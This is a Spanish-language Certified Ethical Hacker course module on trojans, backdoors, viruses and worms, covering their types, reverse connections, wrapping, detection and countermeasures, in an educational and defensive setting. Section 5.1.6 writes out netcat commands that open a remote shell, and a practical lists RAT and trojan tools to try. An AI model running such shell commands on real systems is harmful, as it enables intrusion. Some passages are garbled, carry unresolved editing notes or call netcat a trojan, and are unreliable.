CEH (Certified Ethical Hacker) 5.

Troyanos y puertas traseras

5.- Troyanos y puertas

traseras.

aula.badiatech.org 1
 CEH (Certified Ethical Hacker) 5. Troyanos y puertas traseras

Contenido del Tema

5.1 Troyanos y Puertas traseras.
5.1.1 ¿Qué es una puerta trasera?.
5.1.2 ¿Qué es un troyano?.
5.1.3 ¿Qué se entiende por canales abiertos y encubiertos?.
5.1.4 Lista los diferentes tipos de troyanos.
5.1.5 ¿Cómo funciona la conexión inversa en los troyanos?.
5.1.6 Comprender como funciona un troyano basado en netcat.
5.1.7 ¿Qué es el “Wrapping”?.
5.1.8 Kits para la construcción de troyanos y fabricantes de troyanos.
¿Cuáles son las contramedidas utilizadas para la prevención de troyanos?.
5.1.9 ¿Cuáles Son las Técnicas para la Prevención de Troyanos?.
5.1.10 Comprender las técnicas evasivas de los troyanos.
5.1.11 Subobjetivo de verificación de ficheros del Sistema frente las contramedidas de
los troyanos.
5.2 Virus y Gusanos.
5.2.1 Entender las diferencias entre un Virus y un Gusano.
5.2.2 Conocer los tipos de virus.
5.2.3 Comprender las técnicas de evasión del antivirus.
5.2.4 Comprender como un Virus se extiende e Infecta un Sistema.
5.2.5 Comprender las técnicas de evasión del antivirus.
5.2.6 Conocer métodos de descubrimiento de virus.

Objetivos del Tema.

Al terminar el tema el Alumno deberá ser capaz de:

– Conocer la definición de un troyano.

– Conocer la definición de un canal encubierto.
– Conocer los canales tunelizados ICMP más comunes.
– Conocer la definición de puerta trasera.
– Saber utilizar un troyano.
– Conocer las diferencias entre virus y gusano.
– Conocer las diferencias entre los diferentes virus.

aula.badiatech.org 2
 CEH (Certified Ethical Hacker) 5. Troyanos y puertas traseras

5.1 Troyanos y Puertas traseras.

Los troyanos y las puertas traseras son dos modos que un hacker tiene para poder
ganar el acceso a un sistema objetivo. Estos tienen muchas variedades diferentes, pero todos
ellos tienen una cosa en común: Deben ser instalados por otro programa, o el usuario debe ser
engañado e incitado a instalar el troyano en secreto dentro de su sistema. Los troyanos y las
puertas traseras son herramientas potencialmente dañinas en el kit de herramientas del
hacker ético y deberían ser usadas juiciosamente para probar la seguridad de un sistema o red.

Los virus y los gusanos pueden ser tan destructivos en sistemas y redes como los
troyanos y las puertas traseras. De hecho, muchos virus llevan ejecutables que realmente son
troyanos y pueden infectar un sistema donde crean una puerta trasera que posteriormente
puede ser utilizada por hackers. En este temas hablaremos de las semejanzas y diferencias
entre troyanos, puertas traseras, virus y gusanos. Todos estos tipos del código malicioso o
malware son conocimientos importantes para los hackers éticos porque son comúnmente
usados para comprometer sistemas. (reescribir desde el último punto, no se entiende)

5.1.1 ¿Qué es una puerta trasera?.

Una puerta trasera es un programa o un conjunto de programas relacionados que un

hacker instala en un sistema objetivo para permitir el acceso al sistema en un momento
posterior. El objetivo de una puerta trasera es quitar pruebas de la entrada inicial de los
archivos históricos del sistema. Un hacker puede utilizar una puerta trasera para mantener el
acceso a una máquina a la cual se haya conseguido acceso aun si la intrusión ha sido
descubierta y remediada por el administrador de sistema posteriormente.
El agregar un nuevo servicio es la técnica más común para disfrazar puertas traseras en
el sistema operativo de Windows. Antes de la instalación de una puerta trasera, un hacker
debe investigar el sistema para encontrar los servicios que corren. El hacker podría añadir un
nuevo servicio y darle un nombre discreto.
Esta técnica es eficaz porque cuando una tentativa de corte ocurre, el administrador de
sistema por lo general se concentra en buscar algo extraño en el sistema, dejando todos los
servicios existentes sin comprobar. La técnica es simple, pero eficiente: el hacker puede
regresar en la máquina sin llamar mucho la atención. La puerta trasera corriendo como servicio
puede dar privilegios de administrador al hacker.
La Administración Remota de Troyanos (RATs) son una clase de puerta trasera que solía
permitir el control a distancia sobre una máquina comprometida. Estos programas,
proporcionan, prometen o suelen ofrecer funciones útiles al usuario y, al mismo tiempo, abren
una puerta trasera en el ordenador de la víctima. Una vez que el RATs es ejecutado, se
comporta como un archivo ejecutable, que se relaciona con ciertas teclas de registro,
responsables de comenzar procesos y a veces crear sus propios servicios de sistema. A
diferencia de puertas traseras comunes, Los RATs y las Puertas traseras siempre vienen
embalados con dos archivos: el archivo de cliente y el archivo de servidor. El servidor es
instalado en la máquina infectada, y el cliente está usado por el intruso para controlar el
sistema comprometido.

aula.badiatech.org 3
 CEH (Certified Ethical Hacker) 5. Troyanos y puertas traseras

5.1.2 ¿Qué es un troyano?.

Un troyano es un programa malicioso camuflado como un programa

benigno. Los troyanos suelen venir ocultos en otro programa o paquete de
software. Una vez instalado en un sistema, no solo puede causar el robo de datos
y la pérdida, fallos del sistema o desaceleración, sino que también se puede
utilizar como puntos de lanzamiento de otros ataques, como ataques distribuidos
de denegación de servicio (DDOS). Muchos de los troyanos son utilizados para
manipular archivos en el ordenador de la víctima, gestionar los procesos, de
forma remota dar órdenes al sistema, las pulsaciones de teclado interceptar, ver
imágenes de la pantalla y reiniciar o apagar los sistemas infectados. Los troyanos
sofisticados pueden conectarse directamente a su autor aunque normalmente se
conectan a un canal del Internet Relay Chat (IRC).
Los troyanos cabalgan a lomos de otros programas y suelen instalarse en un
sistema sin el conocimiento del usuario. Un troyano puede ser enviado a un
sistema víctima de muchas maneras: como un Instant Messenger (IM), IRC, un
archivo adjunto de correo electrónico, o utilizando NetBIOS para compartir
archivos. Muchos programas falsos que hacen ver que son software legítimo
como freeware, herramientas anti-spyware, optimizadores del sistema,
protectores de pantalla, música, imágenes, juegos y vídeos se pueden utilizar
para infectar un equipo víctima con tan sólo ser descargados.

Acciones tales como los programas de arranque y funcionamiento sin la

iniciación del usuario, la apertura o cierre del CD-ROM, que los fondos de escritorio
o la configuración del protector de pantalla cambien por sí mismos; el ratón
moviéndose por la pantalla solo o ver como el navegador abre sitios web extraños
o inesperados son todos indicios de una infección por un troyano.

Por lo que cualquier acción que sea sospechosa o no iniciada por el usuario
puede ser un indicio de infección.

5.1.3 ¿Qué se entiende por canales abiertos y encubiertos?

Un canal abierto es la forma normal y legítima que tienen los programas de

comunicación dentro de un sistema informático o red. Un canal encubierto, utiliza los
programas o vías de comunicación de distintas formas a las que se esperan
normalmente.
Los troyanos pueden utilizar la vía encubierta para comunicarse. Algunos troyanos
cliente utilizan la vía encubierta para enviar instrucciones al servidor desde el sistema
comprometido. Esto a veces hace que la comunicación de los troyanos sea difícil de
descifrar y entender.
Los canales ocultos se basan en una técnica denominada tunelización, que permite a
un protocolo hacerse pasar por otro protocolo. Por ejemplo el Internet Control Message
Protocol (ICMP) es un método de utilización del eco ICMP de solicitud y del eco de
respuesta que un atacante puede utilizar para camuflar el tráfico.

aula.badiatech.org 4
 CEH (Certified Ethical Hacker) 5. Troyanos y puertas traseras

5.1.4 Lista los diferentes tipos de troyanos.

Los troyanos pueden ser creados y utilizados para realizar diferentes ataques.
Algunos de los tipos más comunes de troyanos son los siguientes:
- Troyanos de acceso remoto (RAT) - utilizado para obtener acceso remoto a un
sistema remoto.
- Troyanos para el envío de datos - se utilizan para buscar datos en un sistema
para posteriormente entregarlos al hacker.
- Troyanos destructivos - se utilizan para borrar o corromper archivos en un
sistema.
- Troyanos de denegación de servicio - se utilizan para lanzar un ataque de
negación de servicios
- Troyanos Proxy - se utilizan para crear túneles por donde enviar el tráfico o
lanzar ataques a través de otro sistema.
- Troyanos FTP – se utilizan para crear un servidor FTP para copiar archivos en un
sistema.
- Troyano desactivador de la seguridad - se utilizan para evitar el antivirus.

5.1.5 ¿Cómo funciona la conexión inversa en los troyanos?.

Los troyanos que usan la conexión inversa permiten a un atacante acceder de

una máquina en la red interna desde el exterior. El hacker puede instalar un troyano
en un sistema simple de la red interna, como un servidor WWW de shell inversa.
Sobre una base regular (generalmente cada 60 segundos), el servidor interno intenta
obtener acceso al sistema principal externo para recoger órdenes. Si el atacante ha
escrito algo en el sistema principal, este comando se recupera y se ejecuta en el
sistema interno. El WWW de shell inversa utiliza HTTP estándar. Es peligroso porque
es difícil de detectarse, ya que se ve como un cliente navegando por la Web desde la
red interna.

Existen varios programas que utilizan este tipo de conexión, algunos son:
TROJ_QAZ, Donald Dick, Back Orifice 2000,Tini, NetBus o Subseven.

5.1.6 Comprender como funciona un troyano basado en netcat.

Netcat es un troyano que usa una interfaz de línea de ordenes para abrir TCP o
puertas UDP en un sistema objetivo. Un hacker puede entonces conectarse mediante
telnet a aquellos puertos libre y ganar el acceso a la shell del sistema objetivo.

aula.badiatech.org 5
 CEH (Certified Ethical Hacker) 5. Troyanos y puertas traseras

En linux por ejemplo esto se conseguiría con el siguiente comando:

$ nc -l -p 5600 |/bin/bash

Mientras que en windows sería así:

C:\nc 127.0.0.1 4444 -e cmd.exe

5.1.7 ¿Qué es el “Wrapping”?.

El Wrapping (o envoltura) son paquetes de software que son utilizados para

esconder un troyano. Tanto el software legítimo y el troyano se combinan en un
único archivo ejecutable e instalados cuando se ejecuta el programa.
En general, los juegos u otras instalaciones de animación se utilizan como
wrapping. De esta manera, el usuario no se da cuenta de la transformación más
lenta que ocurre mientras el troyano se instala en el sistema, el usuario sólo ve la
aplicación legítima que esta instalando.

Algunas herramientas que utilizan esta técnica son: Graffiti, Silk Rope 2000,
EliTeWrap o IconPlus.

5.1.8 Kits para la construcción de troyanos y fabricantes de

troyanos.

Varias herramientas generadores de troyanos permiten a hackers crear su propio

Troyanos. Tales juegos de herramientas ayudan a hackers a
construir Troyanos que pueden ser personalizados. Estas herramientas pueden ser peligrosas y
pueden salir el tiro por la culata si no son
ejecutadas correctamente. Los nuevos troyanos creados por hackers por lo general tienen la
ventaja añadida de ser pasados por alto por herramientas que escanean el virus y escanean
del modo troyano porque ellos no hacen juego alguno sabe firmas. (reestructurar esta última
parte)
Algunos equipos troyanos disponibles en la red ??? son el Generador de Espía de Sena, el
Equipo de Construcción de Caballo de
Troya v2.0, Correo de Progenic Equipo de Construcción troyano, y caja de Pandora.

5.1.9 ¿Cuáles Son las Técnicas para la Prevención de Troyanos?

La mayor parte de programas antivirus tiene capacidades anti troyanos así

como funcionalidad de retiro y descubrimiento de otros spyware. Estas herramientas

aula.badiatech.org 6
 CEH (Certified Ethical Hacker) 5. Troyanos y puertas traseras

pueden escanear automáticamente discos duros en el arranque para descubrir

programas ocultos y troyanos antes de que puedan causar daño. Una vez que un
sistema es infectado, es difícil limpiarlo, pero existen varias herramientas para llevar a
cabo tal propósito.
Es importante usar aplicaciones comerciales para limpiar un sistema en vez de
herramientas de programas de libre distribución o si son libres, que tengamos
conciencia a ciencia cierta de que no es un software dañino. Además, estas
herramientas pueden identificar puertas que han sido abiertas o archivos que han
cambiado, información que puede ser muy útil.

5.1.10 Comprender las técnicas evasivas de los troyanos

La mejor técnica para la prevención de troyanos y puertas traseras es la de

concienciar y educar a los usuarios para que no instalen herramientas o
aplicaciones sin el consentimiento del administrador de sistemas o la persona
responsable.

Muchos administradores por estos motivos no da privilegios a los usuarios

para que efectúen dichas instalaciones.

También existen varias herramientas para el descubrimiento de puertos

extraños, procesos corriendo en la máquina, etc. Varios programas que tienen este
fin son: Fport, TCPView, PrcView, Inzider, Dsniff o Tripwire.

5.1.11 Subobjetivo de verificación de ficheros del Sistema frente las

contramedidas de los troyanos.

Windows 2003 incluye un rasgo llamado Protección de Archivo de Windows

(WFP) que previene el reemplazo de archivos protegidos. WFP comprueba la
integridad del archivo cuando se intenta sobrescribir un SYS, DLL, OCX, TTF, o
archivo EXE.

Otra herramienta existente llamada sigverif sirve para ver los ficheros firmados
por Microsoft en el sistema. Para utilizar esta herramienta deberemos ejecutarla
desde ejecutar en el menú inicio. (expresarlo de otra forma)
System File Checker es una herramienta basada en la línea de ordenes
utilizada para comprobar si un troyano ha sustituido a otro archivo. Si el sistema
detecta que un archivo ha sido sobrescrito, recupera un archivo bueno conocido de
la carpeta Windows \ system32 \ dllcache y sobrescribe el archivo no verificado. El
comando para ejecutar el sistema de archivos Checker es sfc / scannow.

5.2 Virus y Gusanos

Los virus y los gusanos pueden ser usados para infectar un sistema y
modificarlo para permitir que un hacker gane el acceso.
Muchos virus y gusanos llevan troyanos y puertas traseras. De esta manera un virus

aula.badiatech.org 7
 CEH (Certified Ethical Hacker) 5. Troyanos y puertas traseras

o gusano son “portadores” y permiten que código malicioso, como troyanos y

puertas traseras sea transferido de sistema en sistema.

5.2.1 Entender las diferencias entre un Virus y un Gusano

Un virus y un gusano son similares ya que los 2 son software malicioso

(malware). Un virus infecta a otro ejecutable y usa este programa de portador para
poder extenderse. El código de un virus es inyectado en el programa que antes era
benigno y es extendido cuando el programa es ejecutado.
Unos ejemplos de programas “portadores” de virus son macros, anexos de correo
electrónico, juegos, y animaciones.

Un gusano es un tipo de virus, pero este se auto reproduce. Un gusano se

extiende de sistema en sistema automáticamente, a diferencia de un virus que
necesita de otro programa a fin de poder extenderse. Tanto los virus y los gusanos
se ejecutan sin el conocimiento o el deseo del usuario final.

5.2.2 Conocer los tipos de virus

Los virus son clasificados según dos factores: según lo que infectan y como
lo infectan. Un virus puede infectar los siguientes componentes de un sistema:

Sectores de sistema
Archivos
Macros (como macros de Microsoft Word)
Bibliotecas (archivos de sistema como DLL y archivos INI)
Clusters de disco
Archivos por lote (archivos BAT)
Código fuente

5.2.4 Comprender como un Virus se extiende e Infecta un Sistema

Un virus infecta por la interacción con un sistema exterior. Los virus son
clasificados según su técnica de infección:

aula.badiatech.org 8
 CEH (Certified Ethical Hacker) 5. Troyanos y puertas traseras

- Polymorphic viruses. Estos virus codifican el código de un modo diferente con

cada infección y pueden cambiar a formas diferentes para tratar de evadir su
descubrimiento.
- Stealth viruses. Estos esconden las características del virus real, como la
modificación del tiempo y de la fecha del archivo para dificultar la detección del
mismo.
- Fast and slow infectors. Estos pueden evadir el descubrimiento infectando muy
rápidamente o muy despacio.
- Sparse infectors. Estos virus infectan sólo unos sistemas o aplicaciones.
- Armored viruses. Estos son codificados para prevenir su descubrimiento.
- Multipartite viruses. Estos virus ya son de un nivel mas avanzado, crean
infecciones múltiples.
- Cavity (space-filler) viruses. Estos virus se agregan a áreas vacías de archivos.
- Tunneling viruses. Éstos son enviados vía un protocolo diferente o codificados
para prevenir el descubrimiento o para permitir que pase por un cortafuegos.
- Camouflage viruses. Estos virus se hacen pasar por otro programa.
– NTFS and Active Directory viruses. Éstos expresamente atacan el sistema de
archivo NT o al AD en sistemas Windows.

5.2.5 Comprender las técnicas de evasión del antivirus

Un atacante puede escribir un script o virus que no será descubierto por

programas antivirus. El descubrimiento de los virus y su posterior eliminación están
basados en una firma del programa. Hasta que el virus sea descubierto y las
compañías de antivirus tengan la posibilidad de actualizar sus bases de datos, el
virus no será detectado por el antivirus. Esto permite que un atacante evada el
descubrimiento y la posterior eliminación del virus por parte del antivirus durante
un periodo de tiempo

5.2.6 Conocer métodos de descubrimiento de virus.

Las siguientes técnicas son utilizadas para la detección de virus:

– Escaneo
– Integridad usando los checksums.

aula.badiatech.org 9
 CEH (Certified Ethical Hacker) 5. Troyanos y puertas traseras

– Buscando por la firma del virus.

El proceso para la detección y posterior eliminación del mismo es:

1. Detectar el ataque como un virus. No todo comportamiento extraño en un

sistema debe ser atribuido a una infección por parte de un virus, ya que no
siempre es así.
2. Trazar los procesos del programa usando utilidades como handle.exe,
listdlls.exe, fport.exe, netstat.exe o pslist.exe y hacer un estudio sobre las
coincidencias dadas entre los diferentes sistemas afectados.
3. Detectar el payload utilizado por el virus mirando los ficheros
remplazados, creados o eliminados, cambios en atributos de ficheros
existentes, etc.
4. Adquiera y aísle el vector de infección. Entonces, actualice sus
definiciones de antivirus y escanee de nuevo todos los sistemas.

Conclusiones

El uso de virus y troyanos esta muy extendido y es una de las maneras más
habituales para mantener la posición en un sistema (a parte del uso de rootkits).

Es por esto que estar familiarizado con este tipo de tecnología y saber mitigar su
peligrosidad es algo obligatorio para el Hacker ético.

Práctica de Enumeración

Para una mejor comprensión de las diferentes herramientas se deberá realizar la

práctica la cual estará colgada en el tema del curso.

Las prácticas se han hecho para que el mismo alumno pueda avanzar sin necesidad de
un tutor, por lo que será el propio alumno quien evalúe el trabajo hecho.

En esta práctica en concreto se intentará familiarizar al alumno con las siguientes

herramientas :

Loki/Lokid, TROJ_QAZ, Tini, Donald Dick, Netbus, SubSeven, BackOrifice 2000, BoSniffer,
ComputerSpy Key Logger, Beast, CiberSpy, SubRoot, LetMeRule, Firekiller 2000, The Hard Drive
Killer Pro, netcat, Graffiti, Silk Rope 2000, EliTeWrap, IconPlus, Fport, TCPView, PrcView, Inzider,
Tripwire, Dsniff, handle.exe, listdlls.exe, fport.exe, netstat.exe y pslist.exe

aula.badiatech.org 10